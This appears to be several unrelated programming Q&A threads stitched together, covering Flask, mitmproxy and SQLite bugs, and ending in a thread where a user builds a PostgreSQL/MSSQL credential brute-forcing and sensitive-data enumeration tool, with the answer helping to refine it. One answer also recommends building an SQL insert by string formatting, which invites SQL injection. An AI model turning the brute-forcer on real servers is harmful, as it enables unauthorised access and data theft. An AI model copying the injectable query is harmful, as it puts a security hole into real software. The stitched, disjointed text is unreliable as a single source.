I'm writing an API in Flask and am currently trying to get my POST request to work. Ideally, it would add a band to the DB with a band_id, name, genre, number of gigs, and a rating. For some reason, sending what should be a proper POST request from Postman returns a 405. I didn't even know an API *I made* would tell me I'm not allowed to use a POST method I wrote myself. Do I need to change anything to give it access?
from flask import Flask, request
from flask_restful import Api, Resource
import sqlite3

app = Flask(__name__)
api = Api(app)

class Band(Resource):
    def get(self, band_id):
        conn = sqlite3.connect('database.db')
        c = conn.cursor()
        c.execute("SELECT * FROM bands WHERE band_id=?", (band_id,))
        result = c.fetchone()
        if result:
            return {"message": result}
        else:
            return {"message": "Band not found"}

    def post(self):
        data = request.get_json()
        if not all(key in data for key in ('band_name', 'band_genre', 'gigs', 'rating')):
            return {"message": "Missing data"}
        band_name = data['band_name']
        band_genre = data['band_genre']
        gigs = data['gigs']
        rating = data['rating']
        conn = sqlite3.connect('database.db')
        c = conn.cursor()
        c.execute("INSERT INTO bands (band_name,band_genre,gigs,rating) VALUES (?,?,?,?)",
                  (band_name, band_genre, gigs, rating))
        conn.commit()
        return {"message": "Success"}

api.add_resource(Band, '/bands/<int:band_id>')

if __name__ == "__main__":
    conn = sqlite3.connect('database.db')
    c = conn.cursor()
    c.execute("DROP TABLE IF EXISTS bands")
    c.execute("""CREATE TABLE IF NOT EXISTS bands (
        band_id INTEGER PRIMARY KEY,
        band_name TEXT,
        band_genre TEXT,
        gigs INTEGER,
        rating INTEGER
    )""")
    conn.commit()
    app.run(debug=True)
I've tried changing the call in Postman and fiddling around with my add_resource line, but to no avail. Totally lost on what to do next.
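One thing I'm starting to wonder is whether the problem is that the resource is only registered at /bands/<int:band_id>, so the URL I'm POSTing to in Postman never lines up with a route that accepts my POST. A minimal sketch of what I mean (untested, same names as in my code above):

# Register the resource at both URLs: /bands for POST requests that don't
# carry an id yet, and /bands/<int:band_id> for GET requests that do.
api.add_resource(Band, '/bands', '/bands/<int:band_id>')

With that change I would point Postman at http://127.0.0.1:5000/bands and send a JSON body containing band_name, band_genre, gigs, and rating.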
I am trying to store mitmproxy flows in a database for further processing, but with the following code the insert into the sqlite3 database is simply skipped: no data gets saved and no errors are shown.
from mitmproxy.options import Options
from mitmproxy.proxy.config import ProxyConfig
from mitmproxy.proxy.server import ProxyServer
from mitmproxy.tools.dump import DumpMaster
import sqlite3

conn = sqlite3.connect('traffic.db')
c = conn.cursor()
c.execute("""CREATE TABLE IF NOT EXISTS traffic (
    id INTEGER PRIMARY KEY,
    path,
    method,
    status,
    request,
    response
)""")
conn.commit()

class Addon(object):
    def __init__(self):
        self.num = 1

    def request(self, flow):
        print("flow.request.path")
        print(flow.request.path)
        c.execute("INSERT INTO traffic VALUES (null, :path, :method, :status, :request, :response)",
                  {'path': flow.request.path, 'method': flow.request.method, 'status': flow.response.status_code,
                   'request': flow.request.get_content(), 'response': flow.response.content})
        conn.commit()
        flow.request.headers["count"] = str(self.num)

    def response(self, flow):
        self.num = self.num + 1
        flow.response.headers["count"] = str(self.num)
        print(self.num)

if __name__ == "__main__":
    options = Options(listen_host='0.0.0.0', listen_port=8080, http2=True)
    m = DumpMaster(options, with_termlog=False, with_dumper=False)
    config = ProxyConfig(options)
    m.server = ProxyServer(config)
    m.addons.add(Addon())
    m.run()
What is the correct way of doing this?
I used your SQL code but with a different approach, the same one I used for writing to a text file before. This seems to work, so thank you for the SQL part!
import sqlite3

conn = sqlite3.connect('/home/pi/mitm/traffic.db')
c = conn.cursor()
c.execute("""CREATE TABLE IF NOT EXISTS traffic (
    id INTEGER PRIMARY KEY,
    path,
    method,
    status,
    request,
    response
)""")
conn.commit()

def response(flow):
    c.execute("INSERT INTO traffic VALUES (null, :path, :method, :status, :request, :response)",
              {'path': flow.request.path, 'method': flow.request.method, 'status': flow.response.status_code,
               'request': flow.request.content, 'response': flow.response.content})
    conn.commit()
Then I use mitmdump instead of mitmproxy, like this:
mitmdump -s the_code_above.py
This works for me; hopefully it helps in your case, too.
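For completeness, the class-based addon from your question should work too, as long as the insert happens in the response hook, because flow.response only exists once the response has arrived. A rough, untested sketch of that variant:

import sqlite3

conn = sqlite3.connect('traffic.db')
c = conn.cursor()

class Addon(object):
    def response(self, flow):
        # flow.response is only available here, not in the request hook,
        # so the insert belongs in this hook.
        c.execute("INSERT INTO traffic VALUES (null, :path, :method, :status, :request, :response)",
                  {'path': flow.request.path, 'method': flow.request.method,
                   'status': flow.response.status_code,
                   'request': flow.request.content, 'response': flow.response.content})
        conn.commit()

# Standard addon registration for scripts loaded with: mitmdump -s this_script.py
addons = [Addon()]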
Hi, I am new to Python. I tried to create a class that works with sqlite3. In my read method I try to print some rows, but it does not print anything. Can you help me?
Here is the code. Can you fix it and tell me what the problem is?
class SQLite_class():
    file_name = ''
    table_sql_name = ''
    # con = sqlite3.connect(self.c)

    def creat_file_name(self):
        self.file_name = input("enter the SQL fille name !")
        self.file_name = self.file_name + '.sqlite'
        return self.file_name

    def conncection(self):
        conn = sqlite3.connect(self.file_name)
        return conn

    def creat_cursor(self):
        conn = self.conncection()
        cur = conn.cursor()
        return cur

    def del_table(self):
        cur = self.creat_cursor()
        cur.execute('DROP TABLE IF EXISTS ' + self.table_sql)

    def creat_table(self):
        cur = self.creat_cursor()
        # adding a new option (name of table of more we need to add some {} and use the format function)
        cur.execute('''CREATE TABLE IF NOT EXISTS {} (data TEXT, number INTEGER)'''.format(self.table_sql_name))
        self.commiting()

    def insrt(self):
        cur = self.creat_cursor()
        cur.execute('''INSERT INTO {} (data, number) VALUES (?, ?)'''.format(self.table_sql_name), ('Thunderstruck', 20))

    def close(self):
        conn = self.conncection()
        conn.close()

    def commiting(self):
        conn = self.conncection()
        conn.commit()

    def read(self):
        cur = self.creat_cursor()
        cur.execute('''SELECT data, number FROM {}'''.format(self.table_sql_name))
        for row in cur:
            print(row)

test = SQLite_class()
test.creat_file_name()
test.table_sql_name = 'Track'
test.creat_table()
test.insrt()
test.commiting()
test.read()
test.commiting()
test.close()
The comment # con = sqlite3.connect(self.c) indicates you know what has to be done. I suspect that when it didn't work, you went down the rabbit hole of creating connections everywhere. The program should make one DB connection; every time a method opens a fresh connection, it loses whatever came before (your insert happens on one connection and the commit happens on a different one).
It could declare conn = '', then call conncection() once (and remove the call from the other methods; they'll probably need to take conn as an argument, or use self.conn). It'll take some trial and error, but it will get you to a better place.
And don't forget to fetch the rows once the SELECT has executed.
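Roughly, the single-connection shape I have in mind looks like this (an untested sketch that keeps your method names and simplifies the rest):

import sqlite3

class SQLite_class():
    def __init__(self, table_sql_name):
        self.table_sql_name = table_sql_name
        self.file_name = input("enter the SQL fille name !") + '.sqlite'
        # One connection for the lifetime of the object; every method reuses it.
        self.conn = sqlite3.connect(self.file_name)

    def creat_table(self):
        self.conn.execute('CREATE TABLE IF NOT EXISTS {} (data TEXT, number INTEGER)'.format(self.table_sql_name))
        self.conn.commit()

    def insrt(self):
        self.conn.execute('INSERT INTO {} (data, number) VALUES (?, ?)'.format(self.table_sql_name),
                          ('Thunderstruck', 20))
        self.conn.commit()

    def read(self):
        cur = self.conn.execute('SELECT data, number FROM {}'.format(self.table_sql_name))
        for row in cur.fetchall():  # fetch the rows after the SELECT
            print(row)

    def close(self):
        self.conn.close()

test = SQLite_class('Track')
test.creat_table()
test.insrt()
test.read()
test.close()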
from flask import Flask, jsonify, request, url_for, redirect, session, render_template, g
import sqlite3

app = Flask(__name__)
app.config['DATABASE'] = './data.db'

def connect_db():
    path = r"C:\Users\Arjun\Documents\flask_app\data.db"
    sql = sqlite3.connect(path)
    sql.row_factory = sqlite3.Row
    return sql

def get_db():
    if not hasattr(g, 'sqlite3'):
        g.sqlite_db = connect_db()
    return g.sqlite_db

@app.teardown_appcontext
def close_db(error):
    if hasattr(g, 'sqlite_db'):
        g.sqlite_db.close()

@app.route('/home', defaults={'name': 'Default'})
@app.route('/home/<name>')
def home(name):
    session['name'] = name
    return render_template('home.html', name=name, display=False, mylist=[1, 2, 3, 4]

@app.route('/theform5', methods=['GET', 'POST'])
def theform5():
    if request.method == 'GET':
        return render_template('form.html')
    else:
        name = request.form['name']
        location = request.form['location']
        db = get_db()
        db.execute("insert into users (name, location) values (?, ?)", [name, location])
        db.commit()
        return redirect(url_for('home', name=name, location=location))

@app.route('/viewresults')
def viewresults():
    db = get_db()
    cur = db.execute('select id, name, location from users')
    results = cur.fetchall()
    return 'The ID is {}. Name is {}. The location is {}. '.format(results[1]['id'], results[1]['name'], results[1]['location'])
Error in:
return "The ID is {}. Name is {}. The location is {}".format(results[1]['id'],results[1]['name'],results[1]['location'])
IndexError: list index out of range
Though the table can be edited directly through the terminal, it can't be edited when the Flask web app is run.
Browser: Chrome
SQLite: v3.30.1
Python: v3.8.1
Flask: v1.1.1
You have a syntax error in the return statement of your home function: it is missing a ')' at the end.
In order to run db.execute you would have to set up the cursor first:
db = get_db()
cursor = db.cursor()
cursor.execute("insert into users (name, location) values (?, ?)", [name, location])
Also, maybe your syntax is off; try this:
cursor.execute("insert into users values('%s', '%s')" %(name, location))
Are these not the answers you are looking for?
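As for the IndexError itself: results[1] asks for the second row, so it will fail whenever the users table holds fewer than two rows. A small sketch of a more defensive viewresults, just to illustrate the idea (not your exact code):

@app.route('/viewresults')
def viewresults():
    db = get_db()
    cur = db.execute('select id, name, location from users')
    results = cur.fetchall()
    if not results:
        return 'No rows in users yet.'
    # Use the first row instead of assuming a second one exists.
    row = results[0]
    return 'The ID is {}. Name is {}. The location is {}.'.format(row['id'], row['name'], row['location'])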
I am creating a dictionary attack tool for PostgreSQL. The tool is inspired by m8r0wn's enumdb tool. Mike's tool is aimed at MySQL and MSSQL; I aim to use the same approach he used but modify the actions and the output file. The script should:
1) Read a CSV file that contains targets and ports, one per line, e.g. 127.0.0.1,3380.
2) When provided a list of usernames and/or passwords, cycle through each targeted host looking for valid credentials. By default, it will use newly discovered credentials to search for sensitive information in the host's databases via keyword searches on the table or column names.
3) Extract this information and report it to a JSON, .csv, or .xlsx output file.
I have semi-functional code, but I suspect the PostgreSQL connection function is not working because of the logic behind passing parameters. I am also interested in suggestions on how best to present the tool's results as a JSON file.
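For the JSON output, what I have in mind is roughly this (a sketch only; the result structure and file name are placeholders, not what the tool currently produces):

import json

# Hypothetical shape for collected findings: one dict per host.
results = [
    {"host": "127.0.0.1", "port": 3380, "user": "postgres",
     "password": "guessed", "matches": ["users.password", "billing.card_number"]},
]

# Write the findings to a JSON report file (file name is a placeholder).
with open("enumdb_report.json", "w") as fh:
    json.dump(results, fh, indent=2)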
I understand that in Python, we have several modules available to connect and work with PostgreSQL which include:
Psycopg2
pg8000
py-postgresql
PyGreSQL
ocpgdb
bpgsql
SQLAlchemy
see also https://www.a2hosting.co.za/kb/developer-corner/postgresql/connecting-to-postgresql-using-python
The connection methods I have tried include:
import psycopg2
from psycopg2 import Error
conn = psycopg2.connect(host=host, dbname=db_name, user=_user, password=_pass, port=port)

import pg
conn = pg.DB(host=args.hostname, user=_user, passwd=_pass)

sudo pip install pgdb

import pgdb
conn = pgdb.connect(host=args.hostname, user=_user, passwd=_pass)
I am not sure how to pass the different _user and _pass guesses into psycopg2, for instance, without breaking the code.
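What I am picturing for the guessing loop is roughly the following (a sketch only; users, passwords, host, and port would come from the argument parsing):

import psycopg2

def try_credentials(host, port, users, passwords):
    # Sketch: attempt each user/password pair and return the first connection that succeeds.
    for user in users:
        for passwd in passwords:
            try:
                conn = psycopg2.connect(host=host, port=port, dbname='postgres',
                                        user=user, password=passwd, connect_timeout=3)
                print("[*] Connection established {}:{}@{}".format(user, passwd, host))
                return conn
            except psycopg2.OperationalError:
                # Wrong credentials (or unreachable host); move on to the next guess.
                continue
    return None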
I have imported the following libraries
import re
import psycopg2
from psycopg2 import Error
import pgdb
#import MySQLdb
import pymssql
import argparse
from time import sleep
from sys import exit, argv
from getpass import getpass
from os import path, remove
from openpyxl import Workbook
from threading import Thread, activeCount
The PgSQL block is as follows:
##########################################
# PgSQL DB Class
##########################################
class pgsql():
    def connect(self, host, port, user, passwd, verbose):
        try:
            con = pgdb.connect(host=host, port=port, user=user, password=passwd, connect_timeout=3)
            con.query_timeout = 15
            print_success("[*] Connection established {}:{}@{}".format(user, passwd, host))
            return con
        except Exception as e:
            if verbose:
                print_failure("[!] Login failed {}:{}@{}\t({})".format(user, passwd, host, e))
            else:
                print_failure("[!] Login failed {}:{}@{}".format(user, passwd, host))
            return False

    def db_query(self, con, cmd):
        try:
            cur = con.cursor()
            cur.execute(cmd)
            data = cur.fetchall()
            cur.close()
        except:
            data = ''
        return data

    def get_databases(self, con):
        databases = []
        for x in self.db_query(con, 'SHOW DATABASES;'):
            databases.append(x[0])
        return databases

    def get_tables(self, con, database):
        tables = []
        self.db_query(con, "USE {}".format(database))
        for x in self.db_query(con, 'SHOW TABLES;'):
            tables.append(x[0])
        return tables

    def get_columns(self, con, database, table):
        # database var not used but kept to support mssql
        columns = []
        for x in self.db_query(con, 'SHOW COLUMNS FROM {}'.format(table)):
            columns.append(x[0])
        return columns

    def get_data(self, con, database, table):
        # database var not used but kept to support mssql
        return self.db_query(con, 'SELECT * FROM {} LIMIT {}'.format(table, SELECT_LIMIT))
The MSSQL block is as follows:
# MSSQL DB Class
class mssql():
    def connect(self, host, port, user, passwd, verbose):
        try:
            con = pymssql.connect(server=host, port=port, user=user, password=passwd, login_timeout=3, timeout=15)
            print_success("[*] Connection established {}:{}@{}".format(user, passwd, host))
            return con
        except Exception as e:
            if verbose:
                print_failure("[!] Login failed {}:{}@{}\t({})".format(user, passwd, host, e))
            else:
                print_failure("[!] Login failed {}:{}@{}".format(user, passwd, host))
            return False

    def db_query(self, con, cmd):
        try:
            cur = con.cursor()
            cur.execute(cmd)
            data = cur.fetchall()
            cur.close()
        except:
            data = ''
        return data

    def get_databases(self, con):
        databases = []
        for x in self.db_query(con, 'SELECT NAME FROM sys.Databases;'):
            databases.append(x[0])
        return databases

    def get_tables(self, con, database):
        tables = []
        for x in self.db_query(con, 'SELECT NAME FROM {}.sys.tables;'.format(database)):
            tables.append(x[0])
        return tables

    def get_columns(self, con, database, table):
        columns = []
        for x in self.db_query(con, 'USE {};SELECT column_name FROM information_schema.columns WHERE table_name = \'{}\';'.format(database, table)):
            columns.append(x[0])
        return columns

    def get_data(self, con, database, table):
        return self.db_query(con, 'SELECT TOP({}) * FROM {}.dbo.{};'.format(SELECT_LIMIT, database, table))
The main function block:
def main(args):
    try:
        for t in args.target:
            x = Thread(target=enum_db().db_main, args=(args, t,))
            x.daemon = True
            x.start()
            # Do not exceed max threads
            while activeCount() > args.max_threads:
                sleep(0.001)
        # Exit all threads before closing
        while activeCount() > 1:
            sleep(0.001)
    except KeyboardInterrupt:
        print("\n[!] Key Event Detected...\n\n")
        exit(0)

if __name__ == '__main__':
    version = '1.0.7'
    try:
        args = argparse.ArgumentParser(description=("""
                   {0} (v{1})
    --------------------------------------------------
    Brute force Juggernaut is a PgSQL brute forcing tool.**""").format(argv[0], version), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)

        user = args.add_mutually_exclusive_group(required=True)
        user.add_argument('-u', dest='users', type=str, action='append', help='Single username')
        user.add_argument('-U', dest='users', default=False, type=lambda x: file_exists(args, x), help='Users.txt file')

        passwd = args.add_mutually_exclusive_group()
        passwd.add_argument('-p', dest='passwords', action='append', default=[], help='Single password')
        passwd.add_argument('-P', dest='passwords', default=False, type=lambda x: file_exists(args, x), help='Password.txt file')

        args.add_argument('-threads', dest='max_threads', type=int, default=3, help='Max threads (Default: 3)')
        args.add_argument('-port', dest='port', type=int, default=0, help='Specify non-standard port')
        args.add_argument('-r', '-report', dest='report', type=str, default=False, help='Output Report: csv, xlsx (Default: None)')
        args.add_argument('-t', dest='dbtype', type=str, required=True, help='Database types currently supported: mssql, pgsql')
        args.add_argument('-c', '-columns', dest="column_search", action='store_true', help="Search for key words in column names (Default: table names)")
        args.add_argument('-v', dest="verbose", action='store_true', help="Show failed login notices & keyword matches with Empty data sets")
        args.add_argument('-brute', dest="brute", action='store_true', help='Brute force only, do not enumerate')
        args.add_argument(dest='target', nargs='+', help='Target database server(s)')
        args = args.parse_args()

        # Put target input into an array
        args.target = list_targets(args.target[0])

        # Get Password if not provided
        if not args.passwords:
            args.passwords = [getpass("Enter password, or continue with null-value: ")]

        # Define default port based on dbtype
        if args.port == 0:
            args.port = default_port(args.dbtype)

        # Launch Main
        print("\nStarting enumdb v{}\n".format(version) + "-" * 25)
        main(args)
    except KeyboardInterrupt:
        print("\n[!] Key Event Detected...\n\n")
        exit(0)
I am aware of the documentation at http://initd.org/psycopg/docs/module.html on how connection parameters can be specified. I would like to pass password guesses into the brute class and work through the different combinations.
PEP 8 asks that you please give classes a name starting with a capital letter, e.g. Pgsql.
You mentioned that the pgsql connect() method is not working properly, but you didn't offer any diagnostics such as a stack trace.
You seem to be working too hard, given that the sqlalchemy layer has already addressed the DB portability issue quite nicely. Just assemble a connect string starting with the name of the appropriate DB package, and let sqlalchemy take care of the rest.
All your methods accept con as an argument. You really want to factor that out as the object attribute self.con.
The db_query() method apparently assumes that arguments for WHERE clauses already appear, properly quoted, in cmd. Remembering Little Bobby Tables and his mother, it makes more sense to pass query arguments through the API's parameter binding than to leave the door open to SQL injection.
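To make the sqlalchemy suggestion concrete, here is a rough sketch (the connection details and the query are placeholders, not your tool's actual values):

from sqlalchemy import create_engine, text

# Placeholder credentials/host; in the brute-force loop these would come from the guess lists.
engine = create_engine("postgresql+psycopg2://someuser:somepass@127.0.0.1:5432/postgres",
                       connect_args={"connect_timeout": 3})

with engine.connect() as con:
    # Parameters are bound by the driver, so no hand-quoting of WHERE arguments is needed.
    rows = con.execute(text("SELECT datname FROM pg_database WHERE datname = :name"),
                       {"name": "postgres"}).fetchall()
    print(rows)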